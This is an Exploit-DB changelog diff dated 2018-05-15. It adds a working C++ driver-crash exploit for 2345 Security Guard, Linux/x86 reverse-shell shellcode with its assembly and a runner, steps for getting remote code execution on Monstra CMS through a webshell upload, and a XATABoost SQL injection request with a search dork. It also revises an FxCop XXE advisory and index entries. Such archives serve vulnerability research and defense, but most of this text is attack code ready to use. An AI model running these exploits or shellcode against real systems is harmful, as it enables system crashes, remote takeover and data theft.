DB: 2018-05-15

5 changes to exploits/shellcodes

2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service

FxCop 10/12 - XML External Entity Injection
Microsoft Windows FxCop 10/12 - XML External Entity Injection

Apple Safari 3.2.x - 'XXE' Local File Theft
Apple Safari 3.2.x - XML External Entity Local File Theft

Open-AudIT Community - 2.2.0 – Cross-Site Scripting
Open-AudIT Community 2.2.0 - Cross-Site Scripting
Monstra CMS 3.0.4 - Remote Code Execution
XATABoost 1.0.0 - SQL Injection

Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell Shellcode (96 Bytes)

exploits/php/webapps/44621.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Monstra CMS 3.0.4 Upload Plugin Remote code execution CVE-2018-9037
+# Date: 2018-05-14
+# Exploit Author: Jameel Nabbo
+# Vendor Homepage: https://github.com/monstra-cms/monstra
+# Software Link: https://github.com/monstra-cms/monstra
+# Version: 3.0.4
+# Tested on: MAC OSX
+# CVE :CVE-2018-9037
+
+
+Monstra CMS 3.0.4 allows remote code execution via an upload_file request for a .zip file,
+which is automatically extracted and may contain .php files.
+
+
+Steps to Reproduce
+1: Log in as a user with page editing permissions
+2: Upload a plugin archive containing php webshell code
+3: After successful upload we can execute the command.
+
+Then go to: http://127.0.0.1/plugins/{Name_Of_Zip_File_You_Uploaded}/{File_In_Zip}.php
+
+Solution
+Filter plugin content during plugin upload

exploits/php/webapps/44622.txt

@@ -0,0 +1,21 @@
+# Exploit Title: XATABoost CMS Sql Injection
+# Google Dork: inurl:php?id= Powered by XATABOOST
+# Date: 02.01.2018
+# Exploit Author: MgThuraMoeMyint
+# Vendor Homepage: http://www2.xataboost.com
+# Version: 1.0.0
+# Tested on: Kali Linux
+# SQL Injection Type: Union Based
+# Example URL: http://localhost/news.php?id=[Injection Point]
+
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/news.php?id=[Injection Point]
+Connection: keep-alive
+GET /xata/nonprofit/000026/css/custom.css.php?x=1c383cd30b7c298ab50293adfecb7b18
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/css,*/*;q=0.1
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/news.php?id=[Injection Point]

exploits/windows/dos/44619.cpp

@@ -0,0 +1,176 @@
+# Exploit Title: [BSOD  by IOCTL 0x8000200D in 2345NsProtect.sys  of 2345 Security Guard 3.7]
+# Date: [20180513]
+# Exploit Author: [anhkgg]
+# Vendor Homepage: [http://safe.2345.cc/]
+# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
+# Version: [v3.7] (REQUIRED)
+# Tested on: [Windows X64]
+# CVE : [CVE-2018- 11034]
+
+#include <windows.h>
+#include <stdio.h>
+
+struct NETFW_IOCTL_ADD_PID
+{
+	DWORD pid;
+	char seed[0x14];//
+};//0x18
+
+struct NETFW_IOCTL_SET_PID
+{
+	BYTE set_state;// 
+	BYTE unk;//1
+	WORD buf_len;//2
+	DWORD pid;//4
+	char buf[0x64];//8
+};//6c
+
+struct NETFW_IOCTL_222040
+{
+	DWORD* ptr;
+	DWORD size;
+};//
+
+int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
+{
+	int result; 
+
+	*a1 ^= *a2;
+	*a2 ^= *a1;
+	result = (unsigned __int8)*a2;
+	*a1 ^= result;
+	return result;
+}
+
+int __stdcall sub_12A80(char *a1, int len, char *a3)
+{
+	int result;
+	unsigned __int8 v4;
+	__int16 i;
+	__int16 j;
+	unsigned __int8 k; 
+
+	for ( i = 0; i < 256; ++i )
+		a3[i] = i;
+	a3[256] = 0;
+	a3[257] = 0;
+	k = 0;
+	v4 = 0;
+	result = 0;
+	for ( j = 0; j < 256; ++j )
+	{
+		v4 += a3[j] + a1[k];
+		f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
+		result = (k + 1) / len;
+		k = (k + 1) % len;
+	}
+	return result;
+}
+
+char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
+{
+	char *result;
+	__int16 i; 
+	unsigned __int8 v5; 
+	unsigned __int8 v6;
+
+	v5 = a3[256];
+	v6 = a3[257];
+	for ( i = 0; i < len; ++i )
+	{
+		v6 += a3[++v5];
+		f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]);
+		a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])];
+	}
+	a3[256] = v5;
+	result = a3;
+	a3[257] = v6;
+	return result;
+}
+
+void calc_seed(char* seed, char* dst)
+{
+	char Source1[26] = {0};
+	char a3[300] = {0};
+
+	Source1[0] = 8;
+	Source1[1] = 14;
+	Source1[2] = 8;
+	Source1[3] = 10;
+	Source1[4] = 2;
+	Source1[5] = 3;
+	Source1[6] = 29;
+	Source1[7] = 23;
+	Source1[8] = 13;
+	Source1[9] = 3;
+	Source1[10] = 15;
+	Source1[11] = 22;
+	Source1[12] = 15;
+	Source1[13] = 7;
+	Source1[14] = 91;
+	Source1[15] = 4;
+	Source1[16] = 18;
+	Source1[17] = 26;
+	Source1[18] = 26;
+	Source1[19] = 3;
+	Source1[20] = 4;
+	Source1[21] = 1;
+	Source1[22] = 15;
+	Source1[23] = 25;
+	Source1[24] = 10;
+	Source1[25] = 13;
+
+	sub_12A80(seed, 0x14, a3);             
+	sub_12B60(Source1, 0x1A, a3);
+	memcpy(dst, Source1, 26);
+}
+
+int poc_2345NetFirewall()
+{
+	HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
+		GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
+		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+	if(h == INVALID_HANDLE_VALUE) {
+		printf("[-] Open device error: %d\n", GetLastError());
+		return 1;
+	}
+	DWORD BytesReturned = 0;
+
+	DWORD ctlcode = 0x222298;
+	NETFW_IOCTL_ADD_PID add_pid = {0};
+	add_pid.pid = GetCurrentProcessId();
+
+	if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
+		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
+	}
+
+	ctlcode = 0x2222A4;
+	NETFW_IOCTL_SET_PID set_pid = {0};
+	set_pid.pid = GetCurrentProcessId();
+	set_pid.set_state = 1;
+
+	calc_seed(add_pid.seed, set_pid.buf);
+	set_pid.buf_len = 26;
+
+	if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
+		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
+	}
+
+	//BSOD
+	ctlcode = 0x222040;
+	NETFW_IOCTL_222040 buf_222040 = {0};
+	buf_222040.size = 1;
+	buf_222040.ptr = (DWORD*)0x80000000;
+	if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {
+		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
+	}
+
+	return 0;
+}
+
+int main()
+{
+	poc_2345NetFirewall();
+		
+	return 0;
+}

exploits/windows/local/44603.txt

@@ -1,34 +1,12 @@
-[+] Credits: hyp3rlinx	
-[+] Website: hyp3rlinx.altervista.org
-[+] Source:  http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt
-[+] ISR: Apparition Security          
-
+# Exploit Title: Microsoft Windows FxCop 10/12 - XML External Entity Injection
+# Date: 2018-03-15
+# Exploit Author: Debashis Pal 
+# Vendor Homepage: www.microsoft.com
+# Version: Microsoft Windows "FxCop" v10-12 
+# CVE :  N/A 
  
 ***Greetz: indoushka|Eduardo|Dirty0tis***
 
-
-Vendor:
-========
-www.microsoft.com
-
-
-Product:
-===========
-Microsoft Windows "FxCop" v10-12  
-
-
-
-Vulnerability Type:
-===================
-XML External Entity
-
-
-
-CVE Reference:
-==============
-N/A
-
-
 Security Issue:
 ================
 FxCop is vulnerable to XML injection attacks allowing local file exfiltration and or NTLM hash theft. Tested in Windows 7 and Windows 10 download SDK it works in both. 
@@ -72,32 +50,10 @@ Exploit/POC:
 Files get exfiltrated to attacker server.
 
 
-Network Access:
-===============
-Remote
-
-
-
-Severity:
-=========
-High
-
-
-
 Disclosure Timeline:
 =============================
 Vendor Notification: March 15, 2018
 Vendor opens MSRC Case 44322?: March 16, 2018
 Vendor reproduces issue : April 6, 2018
 Vendor decides to pull all download links instead of advisory or fix : April 9, 2018
-May 9, 2018 : Public Disclosure
-
-
-
-[+] Disclaimer
-The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
-Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
-that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
-is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
-for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
-or exploits by the author or elsewhere. All content (c).
+May 9, 2018 : Public Disclosure

files_exploits.csv

@@ -5970,6 +5970,7 @@ id,file,description,date,author,type,platform,port
 44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
 44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
 44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows,
+44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9709,7 +9710,7 @@ id,file,description,date,author,type,platform,port
 44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
 44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows,
 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
-44603,exploits/windows/local/44603.txt,"FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
+44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
@@ -10930,7 +10931,7 @@ id,file,description,date,author,type,platform,port
 8861,exploits/osx/remote/8861.rb,"Apple iTunes 8.1.1 - 'ITMS' Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",remote,osx,
 8880,exploits/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,remote,linux,
 8897,exploits/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files",2009-06-08,"Jonathan Salwan",remote,windows,
-8907,exploits/multiple/remote/8907.txt,"Apple Safari 3.2.x - 'XXE' Local File Theft",2009-06-09,"Chris Evans",remote,multiple,
+8907,exploits/multiple/remote/8907.txt,"Apple Safari 3.2.x - XML External Entity Local File Theft",2009-06-09,"Chris Evans",remote,multiple,
 8916,exploits/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - Control Server Remote Buffer Overflow",2009-06-09,His0k4,remote,windows,80
 8922,exploits/windows/remote/8922.txt,"Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",remote,windows,
 8930,exploits/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",remote,windows,
@@ -39302,6 +39303,8 @@ id,file,description,date,author,type,platform,port
 44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware,
 44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
 44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
-44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community - 2.2.0 – Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
+44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community 2.2.0 - Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
 44617,exploits/php/webapps/44617.txt,"WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
 44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
+44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php,
+44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php,

files_shellcodes.csv

@@ -883,3 +883,4 @@ id,file,description,date,author,type,platform
 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
 44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
 44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
+44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86

shellcodes/linux_x86/44620.c

@@ -0,0 +1,122 @@
+/*
+; Title:     Linux/x86 - TCP reverse shell
+; Author:     Paolo Perego <paolo@codiceinsicuro.it>
+; Website:  https://codiceinsicuro.it
+; Blog post:
+https://codiceinsicuro.it/slae/assignment-2-create-a-reverse-shellcode/
+; Twitter:    @thesp0nge
+; SLAE-ID:    1217
+; Purpose:   connect to a given IP and PORT and spawning a reverse shell if
+;             connection succeded
+
+
+global _start
+
+section .text
+
+_start:
+
+; Creating the socket.
+;
+; int socket(int domain, int type, int protocol);
+;
+; socket() is defined as #define __NR_socket 359 on
+/usr/include/i386-linux-gnu/asm/unistd_32.h
+; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h
+; SOCK_STREAM is defined as 1 in
+/usr/include/i386-linux-gnu/bits/socket_type.h
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+xor edx, edx
+
+mov ax, 0x167
+mov bl, 0x2
+mov cl, 0x1
+int 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);
+mov ebx, eax ; storing the socket descriptor into EBX for next syscall
+
+; Connect to my peer
+;
+; connect() is defined as #define __NR_connect 362 on
+/usr/include/i386-linux-gnu/asm/unistd_32.h
+; peer.sin_family = AF_INET;
+; peer.sin_port = htons(DPORT);
+; peer.sin_addr.s_addr = inet_addr(IP);
+; ret = connect(sfd, (const struct sockaddr *)&peer, sizeof(struct
+sockaddr_in));
+
+; 127 = 0x7f
+; 0   = 0x0
+; 0   = 0x0
+; 1   = 0x1
+
+; push 0x0100007f
+mov eax, 0xfeffff80
+xor eax, 0xffffffff
+push eax
+push word 0x5c11 ; port 4444 is 0x5c11
+push word 0x2 ; AF_INET is 2
+
+mov ecx, esp
+mov dl, 0x10 ; sizeof(struct sockaddr_in)
+xor eax, eax
+mov ax, 0x16a
+int 0x80
+
+test eax, eax ; check if eax is zero
+jnz exit_on_error
+
+; Duplicating descriptor 0, 1, 2 to the socket opened by client
+;
+; int dup2(int oldfd, int newfd);
+;
+; dup2 is defined as #define __NR_dup2 63 in
+/usr/include/i386-linux-gnu/asm/unistd_32.h
+
+xor ecx, ecx
+mov cl,  2
+xor eax, eax
+
+dup2:
+mov al, 0x3F ; 63 in decimal
+int 0x80 ; duplicating file descriptors in backwards order; from 2 to 0
+dec ecx
+jns dup2
+
+; Executing shell
+;
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+; execve() is defined as #define __NR_execve 11 on
+/usr/include/i386-linux-gnu/asm/unistd_32.h
+
+xor eax, eax
+push eax ; The NULL byte
+push 0x68732f2f ; "sh//". The second '\' is used to align our command into
+the stack
+push 0x6e69622f ; "nib/"
+mov ebx, esp ; EBX now points to "/bin//sh"
+xor ecx, ecx
+xor edx, edx
+mov al, 0xB ; 11 in decimal
+int 0x80
+
+exit_on_error:
+mov bl, 0x1
+xor eax, eax ; zero-ing EAX
+mov al, 0x1
+int 0x80
+*/
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80";
+
+
+int main(int argc, char **argv)
+{
+printf("Shellcode Length:  %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}